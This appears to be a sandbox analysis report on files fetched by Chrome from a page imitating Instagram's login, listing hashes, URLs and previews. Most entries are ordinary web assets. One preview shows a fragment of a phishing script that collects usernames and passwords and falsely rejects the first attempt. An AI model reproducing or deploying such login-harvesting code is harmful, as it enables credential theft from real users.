                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AbstractLinkLynxMode",["FBLynx","LinkshimHandlerConfig"],(function(a,b,c,d,e,f,g){"use strict";function a(a){return a?[c("LinkshimHandlerConfig").www_safe_js_mode,null]:["hover",null]}function b(){d("FBLynx").setupDelegation()}g.getMode=a;g.setupDelegation=b}),98);.__d("DialogHideOnSuccess",["csx","CSS"],(function(a,b,c,d,e,f,g){a=function(){"use strict";function a(a){this._layer=a}var c=a.prototype;c.enable=function(){this._subscription=this._layer.subscribe("success",this._handle.bind(this))};c.disable=function(){this._subscription.unsubscribe(),this._subscription=null};c._handle=function(a,c){b("CSS").matchesSelector(c.getTarget(),"._s")&&this._layer.hide()};return a}();Object.assign(a.prototype,{_subscription:null});e.exports=a}),null);.__d("DialogPosition",["Vector"],(function(a,b,c,d,e,f,g){var h=40,i;function a(a,b,d,e,f){d===void 0&&(d=null);e===void 0&&(e=!1);f===void 0&&(f=!1);var g=c("Vector").getViewportDimensions(),j=!1;e&&d&&(j=d+b>g.y);if(d!=null&
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:C source, ASCII text, with very long lines (1984)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):9204
                                                                                                                                                                                                                                Entropy (8bit):5.329185491092467
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:4RbGMN3dbr3/5kHIb+5VnNACeSLxxS5mwgWcawn/ADhuDVC5:4RFN3dbr3/5KNA6LxxPWkADh8VY
                                                                                                                                                                                                                                MD5:ED263CCBB5012FA8240EFFE80AAD5CC1
                                                                                                                                                                                                                                SHA1:89DFCBC546AC3F54BB54BEA9951FD58C14B37541
                                                                                                                                                                                                                                SHA-256:2281C32FEF109437CF131D03ED582531064D890496CD77A81E777169D5EB6168
                                                                                                                                                                                                                                SHA-512:AD771EF05A60CFB1270BCFAC4518FD870F66B3D55D320D6E9A031FFB85A20BD742BE9871CB087D87EC049EBB71FB3AAF912AFA064E4EBFF38E0875741E03AE2A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/ys/r/4zS6aBDBtHT.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("Banzai",["cr:7383"],(function(a,b,c,d,e,f,g){g["default"]=b("cr:7383")}),98);.__d("EventEmitterWithValidation",["BaseEventEmitter"],(function(a,b,c,d,e,f){"use strict";a=function(a){babelHelpers.inheritsLoose(b,a);function b(b,c){var d;d=a.call(this)||this;d.$EventEmitterWithValidation1=Object.keys(b);d.$EventEmitterWithValidation2=Boolean(c);return d}var c=b.prototype;c.emit=function(b){if(this.$EventEmitterWithValidation1.indexOf(b)===-1){if(this.$EventEmitterWithValidation2)return;throw new TypeError(g(b,this.$EventEmitterWithValidation1))}return a.prototype.emit.apply(this,arguments)};return b}(b("BaseEventEmitter"));function g(a,b){a='Unknown event type "'+a+'". ';a+="Known event types: "+b.join(", ")+".";return a}e.exports=a}),null);.__d("JstlMigrationFalcoEvent",["FalcoLoggerInternal","getFalcoLogPolicy_DO_NOT_USE"],(function(a,b,c,d,e,f,g){"use strict";a=c("getFalcoLogPolicy_DO_NOT_USE")("1814852");b=d("FalcoLoggerInternal").create("jstl_migration",a);e=
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2796)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):29202
                                                                                                                                                                                                                                Entropy (8bit):5.416734730710893
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:E32cy+EbepIFzTbeQzP9/1VwNxmkNP71u4Bh6BIKMzXHtX:uy+Ebe+hTbJNWxp5Nh6BzMzX5
                                                                                                                                                                                                                                MD5:A7C2579885C6D3E48C485B590C75C7B5
                                                                                                                                                                                                                                SHA1:4925F9BA613A1FFCAFDE1A8C94BDF222D6B794B6
                                                                                                                                                                                                                                SHA-256:715AE0EBFC7BF06C2BEEBCA8A4C9C4BFFB5AD215FA980B71541EBD99AB864423
                                                                                                                                                                                                                                SHA-512:1F868DBD8A3C20CD087E0D78423606D77E306AC25A50CD92947CBAAEB21C85225FF474C9E8DD7F86D254B1ABD458194F4BEA0B6E507B4B631401B2BC3D755409
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("DeferredComponent.react",["createCancelableFunction","react"],(function(a,b,c,d,e,f){var g,h=g||b("react");a=function(a){"use strict";babelHelpers.inheritsLoose(c,a);function c(b,c){var d;d=a.call(this,b,c)||this;d.cancelableModulesLoaded=function(){};d.$1=function(a){d.setState({ComponentClass:a},function(){d.props.onComponentLoad&&d.props.onComponentLoad(a)})};var e=null;function f(a){e=a}d.props.deferredComponent(f);d.state={ComponentClass:e};return d}var d=c.prototype;d.componentDidMount=function(){this.cancelableModulesLoaded=b("createCancelableFunction")(this.$1),this.props.deferredComponent(this.cancelableModulesLoaded)};d.componentWillUnmount=function(){this.cancelableModulesLoaded.cancel()};d.render=function(){var a=this.state.ComponentClass;if(!a||this.props.deferredForcePlaceholder)return this.props.deferredPlaceholder;var b=this.props;b.deferredPlaceholder;b.deferredComponent;b.onComponentLoad;b.deferredForcePlaceholder;b=babelHelpers.objectWithoutPr
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3212
                                                                                                                                                                                                                                Entropy (8bit):4.868427484902244
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:1gJY0gXK6gulXtVcf/G9qLi1bg7atsMQtX/2WCwktV:u7stV99qe1cksv5bCjP
                                                                                                                                                                                                                                MD5:477DBD44D5E73A3CB614E8848C5B796A
                                                                                                                                                                                                                                SHA1:07B766C6F560DF6B8AAD13C9DAEC11A18E4DFE98
                                                                                                                                                                                                                                SHA-256:68DFCE70EC7C8A7AA72FFF4CE1A32845BCCD1C36C49F03A4CC50ED05F7BCD275
                                                                                                                                                                                                                                SHA-512:6FCEA1B7B07AFBBFB76A0084B02F886702CD5394CFF01F7A22AD20FEA47921B7340D2E60976D699DA57D267228554C2314397CDF814C6482E9A7797DCA3A4C8A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:document.addEventListener('DOMContentLoaded', () => {.. const form = document.getElementById('telegramForm');.. const loading = document.getElementById('loading');.. const validText = document.querySelector(".invalid") .. let tryCount = 0; // ....... ....... ......... form.addEventListener('submit', function(e) {.. e.preventDefault();.. .. const username = document.getElementById('username');.. const password = document.getElementById('password');.... // ........ ...... invalid-input, .... .. ... ........ ....... username.classList.remove('invalid-input');.. password.classList.remove('invalid-input');.... if (tryCount === 0) {.. // .... ...... ......., ........ ... .......... ...... username.classList.add('invalid-input');.. password.classList.add('invalid-input');.. validText.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:C source, ASCII text, with very long lines (1984)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):9204
                                                                                                                                                                                                                                Entropy (8bit):5.329185491092467
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:4RbGMN3dbr3/5kHIb+5VnNACeSLxxS5mwgWcawn/ADhuDVC5:4RFN3dbr3/5KNA6LxxPWkADh8VY
                                                                                                                                                                                                                                MD5:ED263CCBB5012FA8240EFFE80AAD5CC1
                                                                                                                                                                                                                                SHA1:89DFCBC546AC3F54BB54BEA9951FD58C14B37541
                                                                                                                                                                                                                                SHA-256:2281C32FEF109437CF131D03ED582531064D890496CD77A81E777169D5EB6168
                                                                                                                                                                                                                                SHA-512:AD771EF05A60CFB1270BCFAC4518FD870F66B3D55D320D6E9A031FFB85A20BD742BE9871CB087D87EC049EBB71FB3AAF912AFA064E4EBFF38E0875741E03AE2A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("Banzai",["cr:7383"],(function(a,b,c,d,e,f,g){g["default"]=b("cr:7383")}),98);.__d("EventEmitterWithValidation",["BaseEventEmitter"],(function(a,b,c,d,e,f){"use strict";a=function(a){babelHelpers.inheritsLoose(b,a);function b(b,c){var d;d=a.call(this)||this;d.$EventEmitterWithValidation1=Object.keys(b);d.$EventEmitterWithValidation2=Boolean(c);return d}var c=b.prototype;c.emit=function(b){if(this.$EventEmitterWithValidation1.indexOf(b)===-1){if(this.$EventEmitterWithValidation2)return;throw new TypeError(g(b,this.$EventEmitterWithValidation1))}return a.prototype.emit.apply(this,arguments)};return b}(b("BaseEventEmitter"));function g(a,b){a='Unknown event type "'+a+'". ';a+="Known event types: "+b.join(", ")+".";return a}e.exports=a}),null);.__d("JstlMigrationFalcoEvent",["FalcoLoggerInternal","getFalcoLogPolicy_DO_NOT_USE"],(function(a,b,c,d,e,f,g){"use strict";a=c("getFalcoLogPolicy_DO_NOT_USE")("1814852");b=d("FalcoLoggerInternal").create("jstl_migration",a);e=
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1130)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1854
                                                                                                                                                                                                                                Entropy (8bit):5.311393905103868
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:SKh3RakwAerXcySXPpQxpNpm1TsPSnryYml9:xh8kwA0Gb1TSork9
                                                                                                                                                                                                                                MD5:5025D5524D28AA6879A5F6504C6F1540
                                                                                                                                                                                                                                SHA1:D698AFAAE964F9EE09E3C9BAB04775367E1AAD12
                                                                                                                                                                                                                                SHA-256:C032E30CA71DBF354429DBA854AF78020A36BAC804397992C317A2667128AB47
                                                                                                                                                                                                                                SHA-512:AEAE9632C460D6E5850A3FAF1246EEA8AF0A88CA4A902ED4B2B3CE7D94AD5825D76B31B2372B6CEC3F2E33CDE216853B53FD8FC0203B6CFD01F7B8ED263EAF4A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("SubscriptionsHandler",["invariant"],(function(a,b,c,d,e,f,g,h){"use strict";function i(a){return a.remove||a.reset||a.unsubscribe||a.cancel||a.dispose}function j(a){i(a).call(a)}a=function(){function a(){this.$1=[]}var b=a.prototype;b.addSubscriptions=function(){for(var a=arguments.length,b=new Array(a),c=0;c<a;c++)b[c]=arguments[c];b.every(i)||h(0,3659);this.$1!=null?this.$1=this.$1.concat(b):b.forEach(j)};b.engage=function(){this.$1==null&&(this.$1=[])};b.release=function(){this.$1!=null&&(this.$1.forEach(j),this.$1=null)};b.releaseOne=function(a){var b=this.$1;if(b==null)return;var c=b.indexOf(a);c!==-1&&(j(a),b.splice(c,1),b.length===0&&(this.$1=null))};return a}();g["default"]=a}),98);.__d("throttle",["TimeSlice","TimeSliceInteractionSV","setTimeout","setTimeoutAcrossTransitions"],(function(a,b,c,d,e,f,g){function a(a,b,d){return h(a,b,d,c("setTimeout"),!1)}Object.assign(a,{acrossTransitions:function(a,b,d){return h(a,b,d,c("setTimeoutAcrossTransitions"),!1
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                Entropy (8bit):3.875
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:H+uZYn:euZYn
                                                                                                                                                                                                                                MD5:46DF3E5E2D15256CA16616EBFDA5427F
                                                                                                                                                                                                                                SHA1:BE8F9B307E458075DA0D43585A05F1D451469182
                                                                                                                                                                                                                                SHA-256:AF3248D0B278571EFF9A22F8ED1CEB54B70D202B44FD70ECA4CA13A5771CECC3
                                                                                                                                                                                                                                SHA-512:88FBCC0A92317A0BADE7D4B72C023A16792F3728443075BF4B1767C8A55258836B54D56B24EABE36AE4EF240F796B58B8F1EA10C7E3C146BDE89882FC9ADE302
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAnQR690F0dwYxIFDZFhlU4=?alt=proto
                                                                                                                                                                                                                                Preview:CgkKBw2RYZVOGgA=
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 15352, version 1.0
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):15352
                                                                                                                                                                                                                                Entropy (8bit):7.985451932526745
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:iKXFCNSjIOyUObLAv+aGY+Axe4neARkGbqq:iwCAjfyUOYv+7wxHvqq
                                                                                                                                                                                                                                MD5:4E63F9517611AF5C5680E4330B7B020E
                                                                                                                                                                                                                                SHA1:0B656D159AFB6941054EB17AF7D8C36E7DD36FD5
                                                                                                                                                                                                                                SHA-256:5825C88B68A498C8B3D8D34F0090A625F063A366C8F3CBEBF51E7657623FB13B
                                                                                                                                                                                                                                SHA-512:430261CB783987FA1DBB4A11E0ABCAA3F5866400610528BFDDD7A2A7D18E2863C29D66ECC044E3588F7135620BE262D0C4B925DEAB610C19C5ABE504244CC0FD
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://fonts.gstatic.com/s/googlesans/v58/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPjYUvaYr.woff2
                                                                                                                                                                                                                                Preview:wOF2......;........`..;..............................D..H?HVAR.'.`?STAT..'...0/<....$....b.0.T.6.$..@. ..B..t.........n.....`..18.4....D.....6T..OJ*r..'m.c|..$..f...z.V+.....w.....HC....y;.{uy?..pE.@!.m..S..J..F.{PW?..lD....#.E..dI.B.Q..Zn...8}........$.!:...).9.'(.....'.F..t2.....M}r+o...}......).......G....bx..m...F.S*nT....Y...gb..g..C.i.5.fLX.5.. H..P hH..%.P.....l{.i.w.(o*e?.}&G........[N..i.J....IIJL....~....@H...R.B.TW.:R....OW.W..K.*A..[....}..9.$.v.]._....D.{.7..{........5.;.#.jt.$.q.$|...O2&..ht4::.....s4...)..s.W.....a.n...B..._..80.......\......M..E..B=..f.......Q.h A..&.z.^].U..l.n..Z.^..#. ....p.$....A..-bO...k.M.h..][M.zb.?1.,....Iv.|.$.dz......&.2.......U.n...T.".l.....dE..{.w..Z^....x).2..;..:..v.WvU}.....+.+..t.A....k...#.S...!G.9.[..T...X..........-.a.@..|~.m.uJ.(.o.....&..$.......k..o.N..',iJ$.T...z.gB4%&#c+.&Q=Qev..V8S....93.T.`,.!.H...6...".......obK...8..D.*u.9..........cs|<.C-..1.i\."..q|D...1......f.D....4... &
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 211 x 200, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):5200
                                                                                                                                                                                                                                Entropy (8bit):7.9274026492660745
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:rmf2rbOyPJ9hYAZBwj7T0vNwTdXcavRFbmI870JyBd8cHxm3irUovLQ+PqXF:rM2HOw9hRZu8v+THKvDHHxm3tojbyV
                                                                                                                                                                                                                                MD5:71D6B687C90A54B1B86E17D906BA33CD
                                                                                                                                                                                                                                SHA1:5DAB0FD4A2C06A7D49125C0954486A4321939605
                                                                                                                                                                                                                                SHA-256:7308556C17835FEE3648F14C2B0E23026F81946842889B4586BEFCB5910E19A0
                                                                                                                                                                                                                                SHA-512:0A925171EF387F880FD33995350873E9C7992FED89CC1688C9E4C2618B049B7C68CCEFB6F8E56490AC7C8C71D43665CF462E0AB9E8F779492C6D93F12C01785D
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://www.facebook.com/images/pages/create/community_illustration.png
                                                                                                                                                                                                                                Preview:.PNG........IHDR.............r......sRGB.........IDATx...p\.u...7.u_.IH....2..i.2y.$$...:.&$....@.dRh...dx......J..W,..d...l.,Y.w..%Y...V..J..z...q.Xw.>.{....g..-y......s......f..."$......I.Hz..Vw.*...^,...k.8.$.u.8..........N....@X...5....^%m...@..P.zC.{..cg.]....@d.o.c...S....G.CA..F......(.V.-.h.K....LXkfl....._.5.m..x.#.&...vk..\g.)..1..........Sf.c..sZI.8.....`.{.............E.L.."O!........~l....E.....L.@....".k..O...`..{..............bI{.g.|..;.t.5.....K`.h.K..r?9L..Y.X......i.{...v|/.7......=.. .E....b.7.Ax.O..j.....=..0%#.&...H......nY.......\..["...+x.W#...P....h.No.X{...)x.Gl...K.am3_....[.V..3x.ug8g..%.!]h.......E.ph..2..{.c.<x.~.phn%m!.F.6O....v..'].KQ&/...>8..K......*..t.2@......H.I7....~v.=.... .W..`%..A ..!ZE..Ic.......S.".Mt...GuW.R0.......SA....Yo..L.1z....)..d....UVu4.bI....}.I...S.gG.1V..gT=.(.OPt....tbI....l....x.>>d&<.c...t.M./..gXZZ.~ml|....\.....d.N..t.i.s.F........=.y..9....Y.....t6j....rHU..#H.!.3.,C t.Rl.....P..l..i.!.gU...
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:M3U playlist, ASCII text
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):903
                                                                                                                                                                                                                                Entropy (8bit):5.372090323906076
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:PNfsAAjdrNW8/t3JdrAjP1drAYc6drXvuYJdravSgdrA0HdrRmHTdrS5:lfRcdprdM9dkAdjGYJdmKgd9HdMTdM
                                                                                                                                                                                                                                MD5:255473BB47E5EDD79F2CCBFB9F6D4369
                                                                                                                                                                                                                                SHA1:8724C535C715E135246F2292340136F3E47BAE20
                                                                                                                                                                                                                                SHA-256:C29E311AD195EBB97EA8C62F5B4A42FFEAACE8DE3E83AF4170A61B1C3730F163
                                                                                                                                                                                                                                SHA-512:6575FA3FBD52B465EE25EDC55726BEC219B233D4F62F60C68810C107217D8FA9EC6F45C6D090F09A6628EDDC7968FB3060DEB42A785260F9F25B3D307C7F9466
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/7d/63/19/7d631997-4ce4-6ce9-9141-f0ad3602b2a9/P875466468_Anull_video_gr250_sdr_652x1412.m3u8
                                                                                                                                                                                                                                Preview:#EXTM3U.#EXT-X-TARGETDURATION:6.#EXT-X-VERSION:7.#EXT-X-MEDIA-SEQUENCE:0.#EXT-X-PLAYLIST-TYPE:VOD.#EXT-X-INDEPENDENT-SEGMENTS.#EXT-X-MAP:URI="P875466468_Anull_video_gr250_sdr_652x1412-.mp4",BYTERANGE="899@0".#EXTINF:3.60000,..#EXT-X-BYTERANGE:1647776@899.P875466468_Anull_video_gr250_sdr_652x1412-.mp4.#EXTINF:5.70000,..#EXT-X-BYTERANGE:2090789@1648675.P875466468_Anull_video_gr250_sdr_652x1412-.mp4.#EXTINF:3.53333,..#EXT-X-BYTERANGE:911497@3739464.P875466468_Anull_video_gr250_sdr_652x1412-.mp4.#EXTINF:2.63333,..#EXT-X-BYTERANGE:621829@4650961.P875466468_Anull_video_gr250_sdr_652x1412-.mp4.#EXTINF:3.63333,..#EXT-X-BYTERANGE:1666431@5272790.P875466468_Anull_video_gr250_sdr_652x1412-.mp4.#EXTINF:5.70000,..#EXT-X-BYTERANGE:2040977@6939221.P875466468_Anull_video_gr250_sdr_652x1412-.mp4.#EXTINF:5.20000,..#EXT-X-BYTERANGE:1551608@8980198.P875466468_Anull_video_gr250_sdr_652x1412-.mp4.#EXT-X-ENDLIST.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (372)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):916
                                                                                                                                                                                                                                Entropy (8bit):5.011086393987294
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:u6oTTlrIYevhTuKtLG0M+qJHHVvC2ItVFRJB1i/YAo:upnlrpevhTuAG9+Uk2a3+G
                                                                                                                                                                                                                                MD5:5996AFA7749EBBC4BECDC9452C6D32E3
                                                                                                                                                                                                                                SHA1:B01CBFE75F4DDD0A16425AEA26A83DF0559C5FC6
                                                                                                                                                                                                                                SHA-256:FC72BC08DCE66EAEA9F8B0C665814EE0760A52BD047ECD77572CED5BB3B69E42
                                                                                                                                                                                                                                SHA-512:5E96D4F1C3FC0EA8BBA17ABE3828A552C9368A6639643374E17F298E8DC129A1CC982F5ADDFA0EE1DC7ADAB1ECE2EBA373ED6BA54E479658BD7113345FA88B4A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.var e="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function n(e,n,o){return e(o={path:n,exports:{},require:function(){return function(){throw new Error("Dynamic requires are not currently supported by @rollup/plugin-commonjs")}()}},o.exports),o.exports}export{e as a,n as c}
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (59051)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):135216
                                                                                                                                                                                                                                Entropy (8bit):5.20865355524308
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:cfQ7xyty4W0OwoPkEeG7uOSBok71Ed6mSyqPN6:coUinFC/oG1m9ql6
                                                                                                                                                                                                                                MD5:AB646C3419B494D0F0EBA5E0AA8884EB
                                                                                                                                                                                                                                SHA1:48CE2D6CBBB4FD294EEDE97AAEBE22EB09F2BE8D
                                                                                                                                                                                                                                SHA-256:43ACCC150A222F0DC217BABD74BF9B034215E514FC6584385B66A24427F79A9C
                                                                                                                                                                                                                                SHA-512:057AE62EC73DAF733DC231F4C6E5898216AD54B3CFD69E21B5A99539DDC49DCDFCF9D465BB0E824F027D208EE12FEA82FF770EA9B40DDFA177182960DB44C611
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:"https://static.xx.fbcdn.net/rsrc.php/v3/yy/l/0,cross/_PStGDb9Db2.css"
                                                                                                                                                                                                                                Preview:._53ij{background:#fff;background:var(--card-background, #FFFFFF);position:relative}._53io{overflow:hidden;position:absolute}._53ih ._53io{display:none}.._54af{padding:5px 0 3px;text-align:center}._54ag{background-image:url(/rsrc.php/v3/y_/r/_PSsNz6Ta7r.png);background-repeat:no-repeat;background-size:auto;background-position:0 -265px;animation:rotateSpinner 1.2s linear infinite;display:inline-block;height:12px;margin:2px 12px 0;width:12px}@keyframes rotateSpinner{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}}..._54ni{overflow:hidden;white-space:nowrap}._54nc,._54nc:hover,._54nc:active,._54nc:focus{display:block;outline:none;text-decoration:none}._54nh{display:block;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}._54nu .img,._54nu ._54nh{display:inline-block;vertical-align:middle}...uiScrollableArea{direction:ltr;height:100%;overflow:hidden;position:relative}.uiScrollableAreaWrap{height:100%;outline:none;overflow-x:hidden;overflow-y:scroll;position:relative}.uiScr
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):6780
                                                                                                                                                                                                                                Entropy (8bit):4.792896236973438
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:j8qNV/CFD6peuSHSOlJD0xA9YgFTmaJgTC8B7Z0tx3Axr+I1GqhXszfBmHF:j8YVq4cyOl902ryao7ZsKr+4GIszpSF
                                                                                                                                                                                                                                MD5:955C8AA9F03B8D78C4724A07B349B715
                                                                                                                                                                                                                                SHA1:F7AB5251CD6980844011B1F471B3AE022BCE5EB2
                                                                                                                                                                                                                                SHA-256:6906696174FC86C0520EEC3E47D116F0ACBDC87749BF82A708D2D68D8EE91AC6
                                                                                                                                                                                                                                SHA-512:83AC736B043F7867776B5121514E2D00DB4B778B7264A5F6FBAC254FC65CAA2EE605FD8CE7D050BE2DB94F564EF009D48C888C618D8FD072DF41C814903EAECE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://sayidanur.github.io/instagram.com/
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="pt-BR">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <link rel="stylesheet" href="./styles.css" />. <link rel="icon" type="image/png" href="./img/insta-fav.ico">. <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css" integrity="sha512-SnH5WK+bZxgPHs44uWIX+LLJAJ9/2PkPKZ5QiAj6Ta86w+fsb2TkcmfRyVX3pBnMFcV7oQPJkl9QevSCWr3W6A==" crossorigin="anonymous" referrerpolicy="no-referrer" />. <title>Instagram</title>.</head>.<body>. <main class="flex align-items-center justify-content-center">. <div id="loading" class="loading-overlay" style="display: none;">. <div class="loading-spinner"></div>. </div>. . <section id="mobile" class="flex">. </section>. <section id="auth" class="flex direction-column">. <div class="panel login flex direction-column">. <h1 title="Inst
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 65 x 284, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5029
                                                                                                                                                                                                                                Entropy (8bit):7.83131265888807
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:yXt3SMoogy0d5ktPLPhTaRMg+jGg2amgVK8FIKpryA6QSkbp5cizSX:5MTawtLhT/jQa7xFIKgg54f
                                                                                                                                                                                                                                MD5:C3534300C6C7688FBB99B7CA94DE7B8D
                                                                                                                                                                                                                                SHA1:BA4187E2B35E25690886CAA9938F3EDB8B62DA41
                                                                                                                                                                                                                                SHA-256:55DB8120E6575014C5701E306B8E145FEF14C858162298234DF891BDACABE2FC
                                                                                                                                                                                                                                SHA-512:876E2C44E35E5BBC59C361E466A8316C67E4F26187DFDB6AE3316622D98A04CC48D788776AA61468C3C2C35696E1E7D1D3030424DCFF1D67FFD648C3B97FD178
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:.PNG........IHDR...A..........N).....PLTE....7H.............. GpL.....................................83...........=|..........................................!...........................hhi............z........JNU...-x....2y................`gq........###.5<.........H............q........@.%c.......................___LNQ..........q..q.JNU@.%...S........-w....c...q.`gq.........D.".../x..q.c..@.%.........JNUc..JNU...."&......2y..5<.5<.5<2y..5<.5<.5<JNU...JNU@.%.q.2y.@.%2y.xxx`gq........`gq2y.@.%..........5<...........................:::...UUU......`gq`gq........................q........jkm-w..2y....`gq...c........@.%..............000.5<,w.`gq....5<2y..........I....................111...R...........@.%@.%@.%...ssssss...JNU.q...c..2y.......JNU....q..5<@.%...c............`gq.'^T....tRNS.......-.."..Z..>........'...I=..k.......v...8........Du..f..5[3..pN..o.3.bT...e[&...1....>.....L`O.a).{...#.......*...).y...*...f.*....wd.b...p.5........u-z......{...|..:...
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 56 x 56, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):418
                                                                                                                                                                                                                                Entropy (8bit):7.210997704214975
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:6v/7gp3MDBLr/PNr7ol0vTo/vTKxHC+l8yeah7mqnvfSqZ1:xp3WNr9PzveGxHCR4hvaqZ1
